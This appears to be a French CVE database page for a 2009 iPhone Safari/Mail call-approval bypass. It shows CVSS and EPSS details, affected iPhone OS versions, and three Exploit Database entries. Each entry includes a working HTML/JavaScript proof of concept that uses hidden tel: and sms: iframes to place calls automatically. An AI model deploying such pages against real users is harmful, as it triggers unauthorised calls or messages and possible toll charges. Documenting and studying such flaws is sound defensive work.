Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
5 |
|
AV:N/AC:L/Au:N/C:N/I:P/A:N |
[email protected] |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 33044
Date de publication : 2009-05-16 22h00 +00:00
Auteur : Collin Mulliner
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/35425/info
Apple iPhone is prone to a security-bypass vulnerability that may cause a call to be placed automatically.
Successfully exploiting this issue may allow attackers to bypass the Mail's call-approval dialog and place a call automatically from a vulnerable device.
NOTE: This issue was previously covered in BID 35414 (Apple iPhone and iPod touch Prior to Version 3.0 Multiple Vulnerabilities), but has been assigned its own record to better document it.
<html> <head> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner</title> </head> <body> <iframe src="sms:+12345" WIDTH=50 HEIGHT=10></iframe> <iframe src="tel:+12345" WIDTH=50 HEIGHT=10></iframe> <!-- second iframe is to attack quick users who manage to close the first call-dialog //--> <iframe src="tel:+12345" WIDTH=50 HEIGHT=10></iframe> </body> </html>
Exploit Database EDB-ID : 33045
Date de publication : 2009-05-16 22h00 +00:00
Auteur : Collin Mulliner
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/35425/info
Apple iPhone is prone to a security-bypass vulnerability that may cause a call to be placed automatically.
Successfully exploiting this issue may allow attackers to bypass the Mail's call-approval dialog and place a call automatically from a vulnerable device.
NOTE: This issue was previously covered in BID 35414 (Apple iPhone and iPod touch Prior to Version 3.0 Multiple Vulnerabilities), but has been assigned its own record to better document it.
<html> <head> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner</title> <meta http-equiv="refresh" content="0; URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt"> </head> <body> <script lang=javascript> function a() { document.write("<iframe src=\"tel:+12345\" WIDTH=50 HEIGHT=10></iframe>"); } setTimeout("a()", 100); </script> </body> </html>
Exploit Database EDB-ID : 33046
Date de publication : 2009-05-16 22h00 +00:00
Auteur : Collin Mulliner
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/35425/info
Apple iPhone is prone to a security-bypass vulnerability that may cause a call to be placed automatically.
Successfully exploiting this issue may allow attackers to bypass the Mail's call-approval dialog and place a call automatically from a vulnerable device.
NOTE: This issue was previously covered in BID 35414 (Apple iPhone and iPod touch Prior to Version 3.0 Multiple Vulnerabilities), but has been assigned its own record to better document it.
<html> <head> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner</title> </head> <body> <script lang=javascript> l = "<iframe src=\"sms:"; for (i = 0; i < 10000; i++) { l = l + "3340948034298232"; } l = l + "\" width=10 height=10></iframe><iframe src=\"tel:+12345\" height=10 width=10></iframe>"; document.write(l); </script> </body> </html>
Products Mentioned
Configuraton 0
Apple>>Iphone_os >> Version 1.0.0
Apple>>Iphone_os >> Version 1.0.1
Apple>>Iphone_os >> Version 1.0.2
Apple>>Iphone_os >> Version 1.1.0
Apple>>Iphone_os >> Version 1.1.1
Apple>>Iphone_os >> Version 1.1.2
Apple>>Iphone_os >> Version 1.1.3
Apple>>Iphone_os >> Version 1.1.4
Apple>>Iphone_os >> Version 1.1.5
Apple>>Iphone_os >> Version 2.0
Apple>>Iphone_os >> Version 2.0.0
Apple>>Iphone_os >> Version 2.0.1
Apple>>Iphone_os >> Version 2.0.2
Apple>>Iphone_os >> Version 2.1
Apple>>Iphone_os >> Version 2.1.1
Apple>>Iphone_os >> Version 2.2
Apple>>Iphone_os >> Version 2.2.1
Apple>>Iphone_os >> Version *
Configuraton 0
Apple>>Iphone_os >> Version 1.1.0
Apple>>Iphone_os >> Version 1.1.1
Apple>>Iphone_os >> Version 1.1.2
Apple>>Iphone_os >> Version 1.1.3
Apple>>Iphone_os >> Version 1.1.4
Apple>>Iphone_os >> Version 1.1.5
Apple>>Iphone_os >> Version 2.0
Apple>>Iphone_os >> Version 2.0.0
Apple>>Iphone_os >> Version 2.0.1
Apple>>Iphone_os >> Version 2.0.2
Apple>>Iphone_os >> Version 2.1
Apple>>Iphone_os >> Version 2.1.1
Apple>>Iphone_os >> Version 2.2
Apple>>Iphone_os >> Version 2.2.1
Apple>>Ipod_touch >> Version *
Références